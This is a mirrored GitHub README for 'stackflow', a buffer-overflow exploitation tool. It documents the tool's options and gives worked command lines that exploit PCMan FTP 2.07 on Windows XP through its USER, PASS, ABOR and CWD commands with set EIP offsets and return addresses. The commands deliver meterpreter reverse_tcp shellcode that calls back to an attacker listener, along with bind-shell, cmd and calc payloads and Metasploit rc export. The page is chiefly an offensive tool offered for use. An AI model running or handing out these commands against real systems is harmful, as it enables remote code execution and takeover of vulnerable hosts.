GithubHelp home page GithubHelp logo

0x6b7966 / stackflow Goto Github PK

View Code? Open in Web Editor NEW

This project forked from d4rkcat/stackflow

0.0 0.0 0.0 1014 KB

Universal stack-based buffer overfow exploitation tool

License: GNU General Public License v2.0

Python 100.00%

stackflow's Introduction

stackflow

Universal stack-based buffer overfow exploitation tool

Usage

usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        rhost
  -p RPORT, --rport RPORT
                        rport
  -c CMDS, --cmds CMDS  commands to send to server before overflow
  -v VULNCMD, --vulncmd VULNCMD
                        vulnerable command
  -o OFFSET, --offset OFFSET
                        offset to EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        calculate offset from cyclic pattern EIP string
  -a RETURNADD, --returnadd RETURNADD
                        return address
  -n NOPS, --nops NOPS  number of NOPS \x90 x 4 to prepend
  -m PAYLOAD, --payload PAYLOAD
                        MSF payload
  -i LHOST, --lhost LHOST
                        lhost
  -l LPORT, --lport LPORT
                        lport
  -f FUZZ, --fuzz FUZZ  Fuzz with cyclic pattern of size
  -t, --calc            Send calc.exe shellcode
  -t1, --cmdprompt      Send cmd.exe shellcode
  -d, --display         Display the exploit buffer
  -q, --quiet           Display less cruft
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout for socket (Default: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Export exploit config and metasploit rc file
  -g CFIMPORT, --cfimport CFIMPORT
                        Import and run exploit from config file
  -s STANDALONE, --standalone STANDALONE
                        Export exploit to a standalone python script

All options can be input via the command line or read from a config file.

Some examples for PCMan FTP 2.07 running on WindowsXP SP3(ENG):

Vulnerable app: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

Exploit without any commands and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

Exploit the USER command and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

Exploit the PASS command and send calc.exe shellcode:

./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous' -a 7E429353 -t

Exploit the ABOR command and send meterpreter/bind_tcp shellcode listening on 4444:

./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

Exploit the CWD command and send cmd.exe shellcode and display the exploit buffer:

./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

Fuzz the STOR command with a cyclic buffer of size 3000:

./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

Exploit the CWD command with auto-offset string from EIP after fuzzing crash and send cmd.exe shellcode:

./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1

Export the exploit py and metasploit rc file:

./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

Start msfconsole and run the exploit and handler:

msfconsole -r revCWD.rc

Run the exploit and handler from msfconsole:

resource /path/to/revCWD.rc

Run an exploit from a config file (no handler!):

./stackflow.py -g revCWD(.py)

stackflow's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.